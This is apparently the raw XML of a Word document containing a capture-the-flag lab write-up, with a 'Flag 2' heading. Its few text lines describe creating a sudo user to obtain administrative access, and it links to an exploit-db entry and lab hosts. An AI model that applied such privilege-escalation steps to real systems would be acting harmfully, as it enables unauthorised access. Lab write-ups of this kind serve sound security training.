        <w:t>Hypothetically you could create a sudo user and that user will then be added to the already existing sudo group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9EFE3D" w14:textId="1CAA3A61" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="7A4AE600" w14:textId="25B4333B" w:rsidR="007307F9" w:rsidRDefault="00911B94"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10044A64" wp14:editId="0D1E2638">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>187937</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="402082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491" y="21310"/>
                <wp:lineTo x="21491" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="35407962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79621" name="Picture 1" descr="A computer screen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80D">
        <w:t>Like this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46844886" w14:textId="0597A57C" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="16EBAF73" w14:textId="3E1735DF" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="798148D2" w14:textId="5A8C1BD6" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="24E631C4" w14:textId="14D126FE" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="356EC092" w14:textId="4786C3E1" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="1245C7A5" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="5A0544A6" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="5EE1914D" w14:textId="2CC377C0" w:rsidR="007307F9" w:rsidRDefault="00572B96">
      <w:r>
        <w:t>Boom, now you have administrative access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAAAD29" w14:textId="2B9B53C1" w:rsidR="007307F9" w:rsidRDefault="000A5B7B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251751424" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="00E8F01A" wp14:editId="01F445CE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428571" cy="428571"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20190"/>
                <wp:lineTo x="21351" y="20190"/>
                <wp:lineTo x="21351" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="103617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795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DC1F2" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="05851671" w14:textId="7877E842" w:rsidR="007307F9" w:rsidRDefault="00480EF2" w:rsidP="00480EF2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc153389825"/>
      <w:r>
        <w:t>Flag 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="09231B12" w14:textId="2F39D254" w:rsidR="00480EF2" w:rsidRDefault="00480EF2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251753472" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="58469A36" wp14:editId="5C25F59D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>33309</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3161905" cy="447619"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20250"/>
                <wp:lineTo x="21474" y="20250"/>
                <wp:lineTo x="21474" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="194436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37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7AD49" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="3CF0F782" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="4CD93840" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="442A3CCC" w14:textId="77777777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77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="3B2D5922" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="6F5F9C4D" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="0424692F" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="591EC413" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="3107EE7B" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="0340ED55" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="0C1BC085" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="0A649238" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="68961741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41F96"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="10E46ADA"/>
    <w:lvl w:ilvl="0" w:tplc="CD642A3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2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1228A"/>
    <w:rsid w:val="00012F6B"/>
    <w:rsid w:val="00026DEC"/>
    <w:rsid w:val="000A5B7B"/>
    <w:rsid w:val="000D49F0"/>
    <w:rsid w:val="000E764C"/>
    <w:rsid w:val="0011564D"/>
    <w:rsid w:val="001338AA"/>
    <w:rsid w:val="001405C2"/>
    <w:rsid w:val="00160B52"/>
    <w:rsid w:val="001855A9"/>
    <w:rsid w:val="00190D42"/>
    <w:rsid w:val="00194948"/>
    <w:rsid w:val="001F280D"/>
    <w:rsid w:val="001F54B1"/>
    <w:rsid w:val="001F670F"/>
    <w:rsid w:val="00263566"/>
    <w:rsid w:val="002850F8"/>
    <w:rsid w:val="00285D96"/>
    <w:rsid w:val="00297F1E"/>
    <w:rsid w:val="003122B9"/>
    <w:rsid w:val="003160F6"/>
    <w:rsid w:val="00374850"/>
    <w:rsid w:val="003B7099"/>
    <w:rsid w:val="003D0ABA"/>
    <w:rsid w:val="004059A0"/>
    <w:rsid w:val="00480EF2"/>
    <w:rsid w:val="005214C2"/>
    <w:rsid w:val="00526C10"/>
    <w:rsid w:val="00527359"/>
    <w:rsid w:val="005502E0"/>
    <w:rsid w:val="00572B96"/>
    <w:rsid w:val="00575D72"/>
    <w:rsid w:val="00586175"/>
    <w:rsid w:val="00590CFD"/>
    <w:rsid w:val="005D4E94"/>
    <w:rsid w:val="005F5421"/>
    <w:rsid w:val="00642C4F"/>
    <w:rsid w:val="006807B6"/>
    <w:rsid w:val="006C144F"/>
    <w:rsid w:val="006E17D1"/>
    <w:rsid w:val="006E3F90"/>
    <w:rsid w:val="006F3294"/>
    <w:rsid w:val="00701F6A"/>
    <w:rsid w:val="00712C2A"/>
    <w:rsid w:val="007307F9"/>
    <w:rsid w:val="0073627E"/>
    <w:rsid w:val="0076259E"/>
    <w:rsid w:val="00774B47"/>
    <w:rsid w:val="00775F2D"/>
    <w:rsid w:val="00784817"/>
    <w:rsid w:val="007C4254"/>
    <w:rsid w:val="00800B43"/>
    <w:rsid w:val="008018A3"/>
    <w:rsid w:val="00814D92"/>
    <w:rsid w:val="008363B1"/>
    <w:rsid w:val="008548CF"/>
    <w:rsid w:val="008E4B00"/>
    <w:rsid w:val="008E5560"/>
    <w:rsid w:val="00911B94"/>
    <w:rsid w:val="00953EF8"/>
    <w:rsid w:val="009855EC"/>
    <w:rsid w:val="009A447D"/>
    <w:rsid w:val="009A7E61"/>
    <w:rsid w:val="009C4686"/>
    <w:rsid w:val="00A00F3C"/>
    <w:rsid w:val="00A320D1"/>
    <w:rsid w:val="00A76D4C"/>
    <w:rsid w:val="00A81C9D"/>
    <w:rsid w:val="00A955E2"/>
    <w:rsid w:val="00AB292A"/>
    <w:rsid w:val="00AB687F"/>
    <w:rsid w:val="00AE075B"/>
    <w:rsid w:val="00B0185D"/>
    <w:rsid w:val="00BA6F72"/>
    <w:rsid w:val="00BC1874"/>
    <w:rsid w:val="00BE312F"/>
    <w:rsid w:val="00BF7A34"/>
    <w:rsid w:val="00C05795"/>
    <w:rsid w:val="00C10134"/>
    <w:rsid w:val="00C1059E"/>
    <w:rsid w:val="00C173B3"/>
    <w:rsid w:val="00C17A87"/>
    <w:rsid w:val="00C3012F"/>
    <w:rsid w:val="00C41D42"/>
    <w:rsid w:val="00C92F90"/>
    <w:rsid w:val="00CA1789"/>
    <w:rsid w:val="00CC306E"/>
    <w:rsid w:val="00CD04BA"/>
    <w:rsid w:val="00CF3EAB"/>
    <w:rsid w:val="00D21621"/>
    <w:rsid w:val="00D27B85"/>
    <w:rsid w:val="00D47D5B"/>
    <w:rsid w:val="00DB1E0A"/>
    <w:rsid w:val="00DB5E4D"/>
    <w:rsid w:val="00DC0550"/>
    <w:rsid w:val="00E00780"/>
    <w:rsid w:val="00E04CF0"/>
    <w:rsid w:val="00E32E71"/>
    <w:rsid w:val="00E34442"/>
    <w:rsid w:val="00E366E1"/>
    <w:rsid w:val="00E4397C"/>
    <w:rsid w:val="00E43ED9"/>
    <w:rsid w:val="00E46A25"/>
    <w:rsid w:val="00E54BEF"/>
    <w:rsid w:val="00E56C74"/>
    <w:rsid w:val="00E66DFE"/>
    <w:rsid w:val="00E7603A"/>
    <w:rsid w:val="00EC6536"/>
    <w:rsid w:val="00EF679B"/>
    <w:rsid w:val="00F3099C"/>
    <w:rsid w:val="00F53395"/>
    <w:rsid w:val="00F8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E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1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18A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80E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exploit-db.com/exploits/41910" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="ftp://ftp.cybox.company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monitor.cybox.company/index.php" TargetMode="External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29</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-14T04:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-13T12:14:00Z</dcterms:modified>
</cp:coreProperties>
</file>